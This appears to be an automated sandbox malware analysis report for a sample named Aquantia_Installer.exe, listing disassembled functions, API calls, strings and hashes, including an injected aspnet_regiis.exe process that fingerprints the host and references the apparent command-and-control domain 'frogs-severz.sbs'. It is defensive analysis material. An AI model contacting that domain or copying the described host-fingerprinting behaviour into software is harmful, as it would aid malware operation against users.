Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: db4dc3b1605af957b5643c9e9e99a4a9611e17abe1a60bd1342916807d0f29ae
Instruction ID: 575b111fa8dc3a2386e3cd226d21f69a8eff5c00cf38f16fba863a27d69339ff
Opcode Fuzzy Hash: db4dc3b1605af957b5643c9e9e99a4a9611e17abe1a60bd1342916807d0f29ae
Instruction Fuzzy Hash: F211CA32F41675BBDF228AA98C40B4A33B4AF0276CF152212E91CE7680D7B4ED0086D5

Function 6CF3114A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CF310FC,?,?,6CF310C4,?,00000001,?), ref: 6CF3115F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CF31172
FreeLibrary.KERNEL32(00000000,?,?,6CF310FC,?,?,6CF310C4,?,00000001,?), ref: 6CF31195

Strings

mscoree.dll, xrefs: 6CF31158
CorExitProcess, xrefs: 6CF3116A

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 18e8d36e2f53f69bdc7ffc9af2ff3e99ab6cd0cee8f3ecc6a86b0f6b279deb1e
Instruction ID: 61bea9a687f2f29c70d00386218b7ad44aa47e0c1dcb01a8d7d8a72b83673141
Opcode Fuzzy Hash: 18e8d36e2f53f69bdc7ffc9af2ff3e99ab6cd0cee8f3ecc6a86b0f6b279deb1e
Instruction Fuzzy Hash: C2F08231A11128FBDF11ABD2CD09BDE7ABAEB01359F114060F419A2190CB38CE00DBD0

Function 6CF35767 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CF357EB
__alloca_probe_16.LIBCMT ref: 6CF358B1
__freea.LIBCMT ref: 6CF3591D

Part of subcall function 6CF3491D: HeapAlloc.KERNEL32(00000000,6CF34654,6CF34654,?,6CF33354,00000220,?,6CF34654,?,?,?,?,6CF36771,00000001,?,?), ref: 6CF3494F

__freea.LIBCMT ref: 6CF35926
__freea.LIBCMT ref: 6CF35949

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: bf04b53e4f2922a139ee37d45516fb258e337c1c206bfb0af45a6aed9e427ca5
Instruction ID: 3180d1f316a5fdf5a9d0572be74327e31c159d54c47c3e83c1038feec241aa8e
Opcode Fuzzy Hash: bf04b53e4f2922a139ee37d45516fb258e337c1c206bfb0af45a6aed9e427ca5
Instruction Fuzzy Hash: CF51A07260122ABBEF118E64CC40EAF36A9EF85768F255129FC1C9B650D730DD4587E0

Function 6CF36CB5 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6CF36CCD

Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC

_free.LIBCMT ref: 6CF36CDF
_free.LIBCMT ref: 6CF36CF1
_free.LIBCMT ref: 6CF36D03
_free.LIBCMT ref: 6CF36D15

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5dabbb912b084fc22b0172622c64727333b3d7d49622ef49542f2e0a8b717051
Instruction ID: 977af31a4d2147f0b957f4be189fb76208f71549dcd8e4b440f7924452a1deef
Opcode Fuzzy Hash: 5dabbb912b084fc22b0172622c64727333b3d7d49622ef49542f2e0a8b717051
Instruction Fuzzy Hash: 90F06831602625778A85DB58E58AD6733F9BF823157742806F41DD7E01CB71F98087F0

Function 6CF32794 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CF3292E

Strings

*?, xrefs: 6CF327D7

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 1d30c4eb8f67effc4f09546b95444d24f787f1f7996d8da2a8d7ffcc56a4a3fe
Instruction ID: b3f7a78f6ef188bbca3246f38465859012d1ae9e41ec7fedf568850cb3c753ad
Opcode Fuzzy Hash: 1d30c4eb8f67effc4f09546b95444d24f787f1f7996d8da2a8d7ffcc56a4a3fe
Instruction Fuzzy Hash: A5615E75D00229AFDB14CFA9C8845DDFBF5EF48314B28916AD858E7701D732AE458BE0

Function 6CF326A8 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CF32CCA: _free.LIBCMT ref: 6CF32CD8

Part of subcall function 6CF3389E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CF35913,?,00000000,00000000), ref: 6CF3394A

GetLastError.KERNEL32 ref: 6CF32710
__dosmaperr.LIBCMT ref: 6CF32717
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CF32756
__dosmaperr.LIBCMT ref: 6CF3275D

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 054bd9e2e815fe4ac2dcbaa71ad20bf09e09b0eec5c94d3b2cc36e564c8b5c41
Instruction ID: de0dfaa437a8ac8720b2eee246f870846f716a85c4b2c24664447e4d599e0295
Opcode Fuzzy Hash: 054bd9e2e815fe4ac2dcbaa71ad20bf09e09b0eec5c94d3b2cc36e564c8b5c41
Instruction Fuzzy Hash: 5D21A472604225BF9B109F6A8C8C99B77BCFF413697049615E91D97A52DB32ED008BE0

Function 6CF31FA8 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6CF362B7,?,00000001,6CF346C5,?,6CF36771,00000001,?,?,?,6CF34654,?,00000000), ref: 6CF31FAD
_free.LIBCMT ref: 6CF3200A
_free.LIBCMT ref: 6CF32040
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CF36771,00000001,?,?,?,6CF34654,?,00000000,00000000,6CF3F360,0000002C,6CF346C5), ref: 6CF3204B

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4451c1f70ac8c0e8ca9d4184b8d110daf39cbb1fb494496fddf1e12b9a02259e
Instruction ID: 30be265ff8e4b3bb734496be50439016e95cd392831ef252c2ef688e7a778a3c
Opcode Fuzzy Hash: 4451c1f70ac8c0e8ca9d4184b8d110daf39cbb1fb494496fddf1e12b9a02259e
Instruction Fuzzy Hash: 3D11E37660513A7A9B4166B58C88F6B32799FC327CB242624F12C82A85DF26CC0D82E0

Function 6CF37506 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001), ref: 6CF3751D
GetLastError.KERNEL32(?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001,?,00000001,?,6CF36792,6CF34654), ref: 6CF37529

Part of subcall function 6CF374EF: CloseHandle.KERNEL32(FFFFFFFE,6CF37539,?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001,?,00000001), ref: 6CF374FF

___initconout.LIBCMT ref: 6CF37539

Part of subcall function 6CF374B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CF374E0,6CF36F4D,00000001,?,6CF36246,?,?,00000001,?), ref: 6CF374C4

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001,?), ref: 6CF3754E

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 5a76fd693ef6c27ba531d866d5f96dcef350ced13a007ee5ee95ec3a7a3e51dc
Instruction ID: eb5063150edbc6443e343fc070da1e57e2bccb2c2df021ef14a85a42bcf9728e
Opcode Fuzzy Hash: 5a76fd693ef6c27ba531d866d5f96dcef350ced13a007ee5ee95ec3a7a3e51dc
Instruction Fuzzy Hash: 6DF0F836A11169FBCFA21ED6CD04E893F76EB1A6B1B044011FA1D85620C6368820EBE4

Function 6CF318D4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CF318DD

Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC

_free.LIBCMT ref: 6CF318F0
_free.LIBCMT ref: 6CF31901
_free.LIBCMT ref: 6CF31912

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5b49e0742fd211298701c9e409518bf6cf2d30245b7015b857d1006f84bf18b0
Instruction ID: 313453ac5fd7d84c84a53b79f5b89777e171e6f8052961bb26df0e060000adcd
Opcode Fuzzy Hash: 5b49e0742fd211298701c9e409518bf6cf2d30245b7015b857d1006f84bf18b0
Instruction Fuzzy Hash: B0E04678E32230BADFD21FA0D8156AD3AB5EF4B6083441106F4088A712E732021A9FD1

Function 6CF311D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Aquantia_Installer.exe, xrefs: 6CF3121B, 6CF31222, 6CF31258

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Aquantia_Installer.exe
API String ID: 0-475832001
Opcode ID: e37f0b942ecf918cfde869293538ba9872a755a6aff0072e0a5dc85cf24ee037
Instruction ID: c341eef6dc0bc9204ee1aeade326b4ef73a4245a5fe88572509e9c4b98cbfd1b
Opcode Fuzzy Hash: e37f0b942ecf918cfde869293538ba9872a755a6aff0072e0a5dc85cf24ee037
Instruction Fuzzy Hash: D5416271E01224BBDB11CB99CD80ADEBBF8EF8A314B109066E419D7B41E771DA45CBE4

Function 0100C5A0 Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

!%, xrefs: 0100C69D
][, xrefs: 0100C5E2
+(, xrefs: 0100C6B3
YW, xrefs: 0100C5EA

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: !%$+($YW$][
API String ID: 0-3547823768
Opcode ID: 4916304bb72508b20e9882bd0692e9cd1a56b0bca94c66996da5288eb0dd5e0b
Instruction ID: 4c26cdba996906c7df165e04627f7458abeb2a5988bb5b4381645d75cf1988a3
Opcode Fuzzy Hash: 4916304bb72508b20e9882bd0692e9cd1a56b0bca94c66996da5288eb0dd5e0b
Instruction Fuzzy Hash: 4A5123B25497819FE334CF61D88178BBAA2BBC2740F258D1CD5D95B354DB748446CF82

Analysis Process: aspnet_regiis.exePID: 2380, Parent PID: 3716COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26.1%
Total number of Nodes:	310
Total number of Limit Nodes:	9

Executed Functions

Function 02F89160 Relevance: 26.8, APIs: 11, Strings: 4, Instructions: 594
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(02F94678,00000000,00000001,02F94668,00000000), ref: 02F8926D
SysAllocString.OLEAUT32(97259936), ref: 02F8931D
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02F8936B
SysAllocString.OLEAUT32(31ED3FD5), ref: 02F893E4
SysAllocString.OLEAUT32(59015B11), ref: 02F8949C
VariantInit.OLEAUT32(?), ref: 02F8950F
VariantClear.OLEAUT32(?), ref: 02F89670
SysFreeString.OLEAUT32(?), ref: 02F89694
SysFreeString.OLEAUT32(?), ref: 02F8969A
SysFreeString.OLEAUT32(?), ref: 02F896AE
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,B1FB8FAB,00000000,00000000,00000000,00000000), ref: 02F896E6

Strings

325, xrefs: 02F89381
C, xrefs: 02F8921C
0W(U, xrefs: 02F89404
\, xrefs: 02F89227

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: 0W(U$C$\$325
API String ID: 2573436264-3066721790
Opcode ID: 536b745a67ee3344744de2ae5f648c4c541e7a43988cd5307827e75074a10918
Instruction ID: 100aa301d2e14bfb3b9c32088bd583b3923ad31d6b9a7abe1aef6c5364957e65
Opcode Fuzzy Hash: 536b745a67ee3344744de2ae5f648c4c541e7a43988cd5307827e75074a10918
Instruction Fuzzy Hash: 3A122271A083409BD714DF64CC85B6BBBE5EB84794F048A2CFA95AB3C0D7B4D905CB92

Function 02F6AA63 Relevance: 22.1, APIs: 1, Strings: 11, Instructions: 1115COMMON

Download Yara Rule

Strings

8?=5, xrefs: 02F6B3A5
93<4, xrefs: 02F6B35C
tx, xrefs: 02F6B69F
y~yx, xrefs: 02F6B694
v, xrefs: 02F6ADCC
AC, xrefs: 02F6BA20
PZ, xrefs: 02F6C0A9
RXRQ, xrefs: 02F6B26B
`o, xrefs: 02F6B8DC
<0, xrefs: 02F6B77C
UM, xrefs: 02F6C093

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: AC$8?=5$93<4$<0$PZ$RXRQ$UM$`o$tx$v$y~yx
API String ID: 0-3367581349
Opcode ID: 53e6a3dbc55546d736a21b4e89aec0cdafa0f307e32677a1582fea2e6bd3a015
Instruction ID: d9faac5f0e5caa400b19712967c8515b3b0944064113ed8e3ebe7b2dfd567d12
Opcode Fuzzy Hash: 53e6a3dbc55546d736a21b4e89aec0cdafa0f307e32677a1582fea2e6bd3a015
Instruction Fuzzy Hash: 47820FB19083808BD3358F24D8957EFB7E1FF95394F088A2CD6CA9B291E7749541CB92

Function 02F7DEC9 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 02F7DFD7
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02F7E00D
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 02F7E0E3

Strings

KJI', xrefs: 02F7E2CC
1>>;, xrefs: 02F7E0EF

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: 1>>;$KJI'
API String ID: 2243422189-1477294040
Opcode ID: 847f08f29d29bece75da8bc157f857930574a9ff508ec84ca1b266fe61f1a5d9
Instruction ID: 64d8b959ddb6a5651dddef023630091108c65508323258226c93c7010b1e6965
Opcode Fuzzy Hash: 847f08f29d29bece75da8bc157f857930574a9ff508ec84ca1b266fe61f1a5d9
Instruction Fuzzy Hash: AA02C771604B818EE729CF35C5917A3BBD2EF57344F0889AEC2DB8B282D739A505CB51

Function 02F5DDA7 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 02F5DDBC

Strings

frogs-severz.sbs, xrefs: 02F5E254
Tl, xrefs: 02F5DDCA
<?, xrefs: 02F5E17C
LMNW, xrefs: 02F5DEB9

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: <?$LMNW$Tl$frogs-severz.sbs
API String ID: 3861434553-2681481848
Opcode ID: 2ecb5cdc956c59c698481c9f1bdafe2de73f87a594bb796b822ce9f059bf7abd
Instruction ID: cc22b41cd825eedd8e69dbee12c7baa6777cbc7c8662dba5ac0ae60852492c84
Opcode Fuzzy Hash: 2ecb5cdc956c59c698481c9f1bdafe2de73f87a594bb796b822ce9f059bf7abd
Instruction Fuzzy Hash: BAB1F17190D3928FD3398F25C0917ABBBE1EFE2344F19895DE9CA9B241D774440A8B92

Function 02F58CF0 Relevance: 7.7, APIs: 5, Instructions: 160
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02F58D12
GetCurrentThreadId.KERNEL32 ref: 02F58D25
GetCurrentProcessId.KERNEL32 ref: 02F58D2D
GetForegroundWindow.USER32 ref: 02F58E2A
ExitProcess.KERNEL32 ref: 02F58EF4

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: cb0404258745ba820d8d4a296651a5da8c76c27f822cdb4ab4d0286457631ead
Instruction ID: c1f142e1f8b372c49994082af4dd3738477e663b162b8051d0fb8b6c9815f053
Opcode Fuzzy Hash: cb0404258745ba820d8d4a296651a5da8c76c27f822cdb4ab4d0286457631ead
Instruction Fuzzy Hash: 1E41AB73F8062807E31CADB9DCDA369B5975BC4248F0E853EAE459B394EDB88D0906C0

Function 02F7E596 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 385
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02F7E6FC

Strings

nBLR, xrefs: 02F7E5A2
=G>D, xrefs: 02F7E874
wt&h, xrefs: 02F7E782

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: =G>D$nBLR$wt&h
API String ID: 3960555810-4232340594
Opcode ID: fad5c356d7b7a7b689865ba72fc80b612dbee828399aaa21330abe53946edd2a
Instruction ID: d950fcbdda42dd8d86aed6b11612bf42ab019d0f61b01f2f1d2433053f720f99
Opcode Fuzzy Hash: fad5c356d7b7a7b689865ba72fc80b612dbee828399aaa21330abe53946edd2a
Instruction Fuzzy Hash: FDC1CA75A047818FD725CF3984907A3BBE2AF57344F1889AEC1EB8B742D7796406CB11

Function 02F7CDBA Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02F7E6FC

Strings

=G>D, xrefs: 02F7E874
wt&h, xrefs: 02F7E782

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: =G>D$wt&h
API String ID: 3960555810-1734137225
Opcode ID: dcaadafadde578e139e81c98e0edbe6c7bcf74da9f77c9b0a5809ba38d49c0c1
Instruction ID: dc6d9d99e2778e1ea1314c1cbe0203c6f40733726787fd89ebb99c3497a45e33
Opcode Fuzzy Hash: dcaadafadde578e139e81c98e0edbe6c7bcf74da9f77c9b0a5809ba38d49c0c1
Instruction Fuzzy Hash: 95B1C775A04B818FD725CF39C4907A3BBE2AF56348F1889AEC1EB87742D775A406CB11

